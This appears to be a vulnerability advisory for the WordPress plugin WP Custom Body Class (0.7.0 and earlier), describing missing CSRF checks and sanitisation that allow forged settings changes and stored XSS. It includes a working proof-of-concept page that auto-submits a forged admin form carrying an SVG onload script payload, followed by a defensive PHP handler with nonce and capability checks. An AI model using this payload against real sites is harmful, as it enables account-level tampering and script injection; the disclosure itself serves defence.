WP Custom Body Class <= 0.7.0 - CSRF to Stored XSS and Settings Update



Description
Missing CSRF checks and input sanitisation when updating the plugin's settings could lead to unauthorised settings updates as well as stored XSS.

XSS fixed in 0.7.0. CSRF still there - vendor contacted
CSRF fixed in 0.7.1
Proof of Concept
<html>
  <body onload="document.forms[0].submit()">
    <form action="https://<BLOG>/wp-admin/options-general.php?page=custom_body_class" method="POST">
      <input type="hidden" name="global_class" value='"><svg/onload=alert(/XSS/)>' />
      <input type="hidden" name="enable_autocomplete" value="1"/>
    </form>
  </body>
</html>
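
The server-side checks whose absence the description names, as an added example that is not the plugin's own code or its 0.7.1 patch: a settings handler that requires a capability check and a nonce, then sanitises the class value before storing it. The field names and page slug come from the PoC above; the cbc_ function, nonce and option names are assumptions.

```php
<?php
// Added example: hypothetical handler, not the plugin's code or its 0.7.1 patch.
// global_class, enable_autocomplete and the page slug come from the PoC;
// every cbc_* / CBC_* name is an assumption made for illustration.
const CBC_NONCE_ACTION = 'cbc_save_settings';

// Settings form: carries a per-user nonce and escapes the stored value on output.
// Assumed to be registered as the page callback via add_options_page().
function cbc_render_settings_form() {
    $class = get_option( 'cbc_global_class', '' );
    ?>
    <form method="post">
        <?php wp_nonce_field( CBC_NONCE_ACTION, 'cbc_nonce' ); ?>
        <input type="text" name="global_class" value="<?php echo esc_attr( $class ); ?>" />
        <input type="checkbox" name="enable_autocomplete" value="1"
            <?php checked( get_option( 'cbc_enable_autocomplete' ), 1 ); ?> />
        <?php submit_button(); ?>
    </form>
    <?php
}

// Save handler: runs only for POSTs to this settings page.
function cbc_save_settings() {
    $page = isset( $_GET['page'] ) ? $_GET['page'] : '';
    if ( 'POST' !== $_SERVER['REQUEST_METHOD'] || 'custom_body_class' !== $page ) {
        return;
    }
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'You are not allowed to change these settings.' );
    }
    // Aborts the request unless cbc_nonce is present and valid for this user,
    // which a cross-site auto-submitting form cannot supply.
    check_admin_referer( CBC_NONCE_ACTION, 'cbc_nonce' );

    // Reduce each whitespace-separated token to [A-Za-z0-9_-] before storing.
    $raw = isset( $_POST['global_class'] ) && is_string( $_POST['global_class'] )
        ? wp_unslash( $_POST['global_class'] ) : '';
    $classes = array_filter( array_map( 'sanitize_html_class', preg_split( '/\s+/', $raw ) ) );
    update_option( 'cbc_global_class', implode( ' ', $classes ) );
    update_option( 'cbc_enable_autocomplete', empty( $_POST['enable_autocomplete'] ) ? 0 : 1 );
}
add_action( 'admin_init', 'cbc_save_settings' );
```

Sanitising on save and escaping on output are both kept so that a value already stored by an unpatched version is still rendered inertly.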

Affects Plugin

fixed in version 0.7.1

References

URL https://plugins.trac.wordpress.org/changeset/2118841

Classification

Type MULTI

Miscellaneous

Verified Yes
WPVDB ID 9456

Timeline

Publicly Published 2019-07-08
Added 2019-07-15
Last Updated 2019-07-16
